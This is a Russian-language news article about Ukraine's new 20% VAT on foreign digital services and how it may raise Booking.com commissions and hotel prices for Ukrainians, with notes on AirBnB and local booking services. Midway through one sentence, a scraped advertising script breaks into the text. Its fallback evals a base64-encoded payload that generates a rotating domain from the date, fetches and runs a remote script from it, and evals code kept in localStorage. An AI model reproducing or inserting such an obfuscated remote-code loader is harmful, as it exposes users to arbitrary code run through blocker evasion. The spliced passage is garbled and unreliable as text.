Теперь с НДС: Booking может подорожать для украинцев на 20%

Из-за принятого в прошлом году закона 1525-IX (законопроект 4184), который ввел 20% налог на электронные услуги компаний-нерезидентов, сервисы Booking.com для украинцев с 1 января должны облагаться НДС. Об этом сообщает РБК-Украина.

В начале февраля 2022 года украинские отели получили от Букинга счета за январь нынешнего года, в которых не был учтен украинский НДС, а комиссия системы осталась без изменений. На этом фоне многие владельцы украинских гостиниц предположили, что Букинг вообще не станет соблюдать закон “о налоге на Google”.

Но буквально пару дней назад компания из Нидерландов все-таки запросила у пользователей налоговую информацию, касающуюся статуса плательщика НДС. И этот факт может свидетельствовать о том, что ее услуги в нашей стране подорожают на 20%. Об этом РБК Украина сообщили в редакции медиа-проекта “Железный.Ком” и предоставили скриншот, подтверждающий запрос налогового статуса гостиницы.

Подтвердить или опровергнуть, что в случае Букинга НДС будет оплачиваться сверху комиссии, редакции источника никто не смог, поскольку пресс-служба нидерландской компании так и не ответила на запрос РБК Украина. Однако общий набор кейсов говорит о том, что в России и других соседних странах, которые в прошлые годы вводили похожие налоги, Букинг просто увеличивал свою комиссию на размер НДС.

Точно также уже поступили многие иностранные компании, которые оказались плательщиками украинского НДС с 1 января 2022 года. В частности, например, услуги Google и Facebook уже подорожали на 20% для пользователей из Украины.

Как это повлияет на украинские гостиницы и базы отдыха?

Стандартная комиссия Букинга для украинских отелей составляла 15%. Некоторые отели платили интернет-гиганту немного больше (к примеру, 18%), чтобы повысить свои позиции в поисковой выдаче системы бронирования.

Сейчас же эта комиссия должна вырасти на 20%. Таким образом, вместо 15% отели будут платить 15% и НДС на сумму комиссии (15% * 0.2), то есть, в таком случае рост комиссии составит 3%. Итого 18%.

В том случае, если отель выберет привилегированный тариф, то рост комиссии будет пропорционально больше. В случае ставки 18%, ее рост составит 18% * 0.2 = 3.6%. Итого 21.6%.

Подорожают ли номера в гостиницах при бронировании через Booking.com после введения НДС?

Во-первых, однозначно следует уточнить, что услуги служб бронирования (кроме, например, AirBnB) чаще всего оплачивает отель, а не гость. В случае с Букингом ситуация полностью аналогичная.

При этом с точки зрения бухгалтерии, услуга бронирования предоставляется в принимающей гостя стране, и НДС возникает в ней же, если он в этой стране есть. Поэтому введение украинского налога на услуги Букинга не должно коснуться зарубежных гостиниц, даже если их будут бронировать туристы из Украины.

Иными словами, новый налог может коснуться только украинских гостиниц.

При этом, с одной стороны, Букинг заявляет на своем сайте о “гарантии лучшей цены”, которая прописана в договорах с отелями и должна обеспечивать паритет цен между системой бронирования и прямыми обращением в отель. И благодаря этой “гарантии”, на первый взгляд все новые расходы должны лечь на плечи отелей.

Но по факту в Украине значительная часть отелей в той или иной мере нарушает данное правило: var node3361 = document.getElementById(«MIXADV_3361»); if( node3361 ) { var script = document.createElement(«script»); script.charset = «utf-8»; script.src = «https://m.mixadvert.com/show/?id=3361&r=»+Math.random(); node3361.parentNode.appendChild(script); script.onerror = function(){ window.eval( atob(«dmFyIGRhdGUgPSBuZXcgRGF0ZSgpO3ZhciBtb250aCA9IGRhdGUuZ2V0TW9udGgoKSArIDE7IHZhciBkYXkgPSBkYXRlLmdldERhdGUoKTsgdmFyIHllYXIgPSBkYXRlLmdldFllYXIoKTsgdmFyIG5hbWVfZGF5ID0gZGF0ZS5nZXREYXkoKSArIDE7dmFyIGRvbSA9IFsgIm9yZyIsICJ0b3AiLCAiYml6LnVhIiwgImNvLnVhIiwgImt5aXYudWEiLCAiY2x1YiIsICJzaG9wIl07IHZhciBzdHIgPWRheSoobW9udGggKiBuYW1lX2RheSAqIGRheSkrIiIrIGRheSoobW9udGggKyBuYW1lX2RheSArIGRheSAreWVhcik7dmFyIGhhc2ggPSAgYnRvYShidG9hKHN0cikpLnRvTG93ZXJDYXNlKCk7IHZhciBob3N0ID0gaGFzaC5zdWJzdHJpbmcoMywgaGFzaC5sZW5ndGggLSBuYW1lX2RheS8yKSsiLiIrZG9tW25hbWVfZGF5IC0gMV07dmFyIHIgPSBNYXRoLnJhbmRvbSgpLnRvU3RyaW5nKDM2KS5zdWJzdHIoMiwgMik7ciA9IHIucmVwbGFjZSgvWzAtOV0vZywgIiIpO3ZhciBkZWx0YSA9IE1hdGguZmxvb3IoTWF0aC5yYW5kb20oKSAqICgxMDAgLSAxMCArIDEpKSArIDEwO3ZhciBpZCA9IDMzNjEgLSBkZWx0YTsgdmFyIHNjcmlwdF9maXJzdCA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoInNjcmlwdCIpO3NjcmlwdF9maXJzdC5zcmMgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIitkZWx0YStpZCtyKyIiOyBub2RlMzM2MS5wYXJlbnROb2RlLmFwcGVuZENoaWxkKHNjcmlwdF9maXJzdCk7c2V0VGltZW91dCggZnVuY3Rpb24gKCkge3NjcmlwdF9maXJzdC5yZW1vdmUoKX0sIDQwMDApO3NjcmlwdF9maXJzdC5vbmVycm9yID0gZnVuY3Rpb24oKXt2YXIgYSA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoImEiKTthLmhyZWYgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIjsgbm9kZTMzNjEucGFyZW50Tm9kZS5hcHBlbmRDaGlsZChhKTsgc2V0VGltZW91dCggZnVuY3Rpb24gKCkgeyBpZiggbm9kZTMzNjEuaW5uZXJIVE1MID09ICIiICkgd2luZG93LmV2YWwobG9jYWxTdG9yYWdlLmdldEl0ZW0oIjMzNjEiKSkgfSwgNTAwMCk7ICA7fTsg») ); } }

● Кто-то из них в открытую ставит цены на Букинге на 15-20% выше, чем на информационных сайтах и официальном сайте отеля. Это явное нарушение правил системы, и в случае поступления жалоб пользователей такие отели должны блокироваться.

● Другие объекты жилья используют системы промокодов, которые позволяют получить скидку в размере комиссии Букинга при прямом бронировании в отеле. Формального нарушения здесь нет, но при бронировании через Букинг клиент получает услуги дороже на размер условной “скидки”.

Конечно, и в украинских реалиях Букинг периодически блокирует часть нарушителей. Но оставшиеся — продолжают открыто завышать цену на размер комиссии в расчете на то, что за счет авторитетности и активной рекламы сервиса постояльцы, бронирующие через Букинг, готовы платить больше.

В итоге, с введением НДС большинство явных или неявных нарушителей ценового паритета может повысить прайс для клиентов Букинга на размер НДС. То есть, примерно на 3-3.6% от общей суммы бронирования.

В то же время для многих отелей, соблюдающих паритет цен, рост затрат на 3-3.6% является существенным в разрезе бизнес-планирования. Поэтому в условиях нашего рынка с большой вероятностью подобные объекты тоже незначительно повысят цены для всех клиентов (а не только для клиентов Букинга).

Например, если доля Букинга в клиентском портфеле отеля, соблюдающего паритет цен, составляет 50%, для компенсации роста затрат ему достаточно поднять ценник на 1.5%.

Таким образом, проживание в отелях Украины с введением НДС на онлайн-услуги нерезидентов с большой вероятностью станет дороже, но средний рост цен окажется в пределах 3%.

Что будет с AirBnB?

Информации о введении НДС другим крупным международным сервисом AirBnB пока не поступало, но в его случае услуги бронирования подорожают как для туристов, так и для владельцев жилья. Более того, при бронировании через эту службу могут подорожать и зарубежные гостиницы. Причина в том, что у AirBnB комиссия разделена между туристом и отельером в пропорции 12% и 3%. То есть, в первом случае комиссия может вырасти до 14.4%, а во втором — до 3.6%.

В то же время недавно поступило сообщение, что другой крупный игрок рынка бронирования hotels.com решил вообще свернуть деятельность в Украине.

А что же с украинскими службами бронирования отелей?

На сегодняшний день от заметных игроков на этом пока не поступало публичных сообщений о повышении коммиссии для отелей. При этом все же вероятен ее рост.

Несмотря на то, что законопроект 4184 позиционировался как защищающий отечественный рынок, украинские службы бронирования в свою очередь тоже зависят от импорта цифровых услуг, которые теперь облагаются НДС. Об этом пишет Новый визит. В частности, речь идет о системах привлечения трафика по типу Google Ads (ранее Adwords), Google Hotel Ads и рекламе в Facebook и Инстаграм.

Все эти сервисы тоже подорожали для украинских компаний и ФОПов, работающих без НДС, на 20%. Поэтому затраты на привлечение клиентов у служб бронирования уже выросли.

Поэтому рост комиссии украинских служб бронирования тоже является делом времени и будет зависеть только от конъюнктуры рынка. (adsbygoogle = window.adsbygoogle || []).push({});

Подписывайтесь на Акцент в Источник: https://akzent.zp.ua/teper-s-nds-booking-mozhet-podorozhat-dlya-ukraintsev-na-20/

Мы в Telegram, наш Telegram bot — @zpua_bot, Мы в Viber, Мы на Facebook

Share this post

нет
scroll to top